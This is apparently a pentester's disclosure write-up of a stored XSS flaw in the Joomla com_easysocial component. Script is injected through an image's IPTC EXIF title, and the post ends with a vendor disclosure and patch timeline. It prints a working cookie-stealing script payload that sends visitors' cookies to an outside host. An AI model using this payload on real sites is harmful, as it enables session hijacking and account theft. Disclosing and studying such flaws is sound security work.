Recently during a pentest on a web application i’ve discovered a little bug on joomla component called com_easysocial. Basically the component lets people to join to social network uploading photos, posting messages on a wall, etc.
On one of this “social fun walls” we can upload an image that other people on the wall can see. This image has a title and description and component reads title from exif IPTC data. The problem was that we can inject XSS on an image uploaded with IPTC exif headers. When user visits the image title is parsed reading the contents of this exif IPTC header and has not enought protection against XSS. I have no code from my client to read and confirm but github had a repo that helps me a lot to figure out and confirm that discover it was true. An example of exif data on this component, see getIptcData and getExifFromFile functions:
With all this information we can script the tipical cookie stealer as a PoC.
1. inject XSS code on exif IPTC headers with “Exif Pilot” or other software you want. As you can see is not a complicated payload at all but it works. Red part is your host where cookie stealer is standing for connection when user visits the image.
The injection part on the IPTC name tag could be something more elegant but for the poc was ok.
Or this one.
<script>image = new Image();image.src='http://220.127.116.11/?'+document.cookie;</script>
2. On the server, prepare a cookie stealer script to capture data and re-send again the user to the original site.
When user visits the image on the wall your server captures the request and save the cookie. See in action with an alert:
- 27/05/2017 – Provider contacted with issue
- 27/05/2017 – Provider replies and works on a fix.
- 01/06/2017 – Provider release a patch
- 13/07/2017 – Published findings.